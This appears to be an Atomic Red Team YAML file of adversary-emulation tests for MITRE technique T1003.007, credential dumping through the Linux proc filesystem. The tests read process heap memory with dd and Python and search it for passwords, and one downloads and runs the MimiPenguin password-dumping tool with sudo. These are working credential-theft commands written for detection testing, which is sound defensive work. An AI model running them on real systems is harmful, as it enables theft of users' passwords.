Hare Sudhan
206 lines
7.5 KiB
YAML
206 lines
7.5 KiB
YAML
attack_technique: T1003.007
|
|
display_name: 'OS Credential Dumping: Proc Filesystem'
|
|
atomic_tests:
|
|
- name: Dump individual process memory with sh (Local)
|
|
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
|
|
description: |
|
|
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
|
|
copy process memory to an external file so it can be searched or exfiltrated later.
|
|
supported_platforms:
|
|
- linux
|
|
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: /tmp/T1003.007.bin
|
|
script_path:
|
|
description: Path to script generating the target process
|
|
type: path
|
|
default: /tmp/T1003.007.sh
|
|
pid_term:
|
|
description: Unique string to use to identify target process
|
|
type: string
|
|
default: T1003.007
|
|
|
|
dependencies:
|
|
- description: |
|
|
Script to launch target process must exist
|
|
prereq_command: |
|
|
test -f #{script_path}
|
|
grep "#{pid_term}" #{script_path}
|
|
get_prereq_command: |
|
|
echo '#!/bin/sh' > #{script_path}
|
|
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
|
|
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
sh #{script_path}
|
|
PID=$(pgrep -n -f "#{pid_term}")
|
|
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
|
|
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
|
|
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
|
|
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
|
|
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
|
|
grep -i "PASS" "#{output_file}"
|
|
cleanup_command: |
|
|
rm -f "#{output_file}"
|
|
|
|
- name: Dump individual process memory with sh on FreeBSD (Local)
|
|
auto_generated_guid: fa37b633-e097-4415-b2b8-c5bf4c86e423
|
|
description: |
|
|
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
|
|
copy process memory to an external file so it can be searched or exfiltrated later.
|
|
On FreeBSD procfs must be mounted.
|
|
supported_platforms:
|
|
- linux
|
|
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: /tmp/T1003.007.bin
|
|
script_path:
|
|
description: Path to script generating the target process
|
|
type: path
|
|
default: /tmp/T1003.007.sh
|
|
pid_term:
|
|
description: Unique string to use to identify target process
|
|
type: string
|
|
default: T1003.007
|
|
|
|
dependencies:
|
|
- description: |
|
|
Script to launch target process must exist
|
|
prereq_command: |
|
|
test -f #{script_path}
|
|
grep "#{pid_term}" #{script_path}
|
|
get_prereq_command: |
|
|
echo '#!/bin/sh' > #{script_path}
|
|
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
|
|
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
sh #{script_path}
|
|
PID=$(pgrep -n -f "#{pid_term}")
|
|
MEM_START=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f1)
|
|
MEM_STOP=$(head -n 5 /proc/"${PID}"/map | tail -1 | cut -d' ' -f2)
|
|
MEM_SIZE=$(echo $(($MEM_STOP-$MEM_START)))
|
|
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
|
|
strings "#{output_file}" | grep -i PASS
|
|
cleanup_command: |
|
|
rm -f "#{output_file}"
|
|
|
|
- name: Dump individual process memory with Python (Local)
|
|
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
|
|
description: |
|
|
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
|
|
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
|
On FreeBSD procfs must be mounted.
|
|
supported_platforms:
|
|
- linux
|
|
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: /tmp/T1003.007.bin
|
|
script_path:
|
|
description: Path to script generating the target process
|
|
type: path
|
|
default: /tmp/T1003.007.sh
|
|
python_script:
|
|
description: Path to script generating the target process
|
|
type: path
|
|
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
|
|
pid_term:
|
|
description: Unique string to use to identify target process
|
|
type: string
|
|
default: T1003.007
|
|
|
|
dependencies:
|
|
- description: |
|
|
Script to launch target process must exist
|
|
prereq_command: |
|
|
test -f #{script_path}
|
|
grep "#{pid_term}" #{script_path}
|
|
get_prereq_command: |
|
|
echo '#!/bin/sh' > #{script_path}
|
|
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
|
|
- description: |
|
|
Requires Python
|
|
prereq_command: |
|
|
(which python || which python3 || which python2)
|
|
get_prereq_command: |
|
|
echo "Python 2.7+ or 3.4+ must be installed"
|
|
|
|
executor:
|
|
name: sh
|
|
elevation_required: true
|
|
command: |
|
|
sh #{script_path}
|
|
PID=$(pgrep -n -f "#{pid_term}")
|
|
PYTHON=$(which python || which python3 || which python2)
|
|
$PYTHON #{python_script} $PID #{output_file}
|
|
grep -i "PASS" "#{output_file}"
|
|
cleanup_command: |
|
|
rm -f "#{output_file}"
|
|
- name: Capture Passwords with MimiPenguin
|
|
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
|
|
description: |
|
|
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
|
|
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
|
|
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
|
|
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: /tmp/T1003.007Test3.txt
|
|
MimiPenguin_Location:
|
|
description: Path of MimiPenguin script
|
|
type: path
|
|
default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
|
|
prereq_command: |
|
|
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
|
|
mkdir /tmp/mimipenguin
|
|
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
|
|
- description: |
|
|
Strings must be installed
|
|
prereq_command: |
|
|
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
sudo apt-get -y install binutils
|
|
- description: |
|
|
Python2 must be installed
|
|
prereq_command: |
|
|
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
sudo apt-get -y install python2
|
|
- description: |
|
|
Libc-bin must be installed
|
|
prereq_command: |
|
|
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
sudo apt-get -y install libc-bin
|
|
executor:
|
|
command: |
|
|
sudo #{MimiPenguin_Location} > #{output_file}
|
|
cat #{output_file}
|
|
cleanup_command: |
|
|
rm -f #{output_file} > /dev/null
|
|
name: bash
|
|
elevation_required: true
|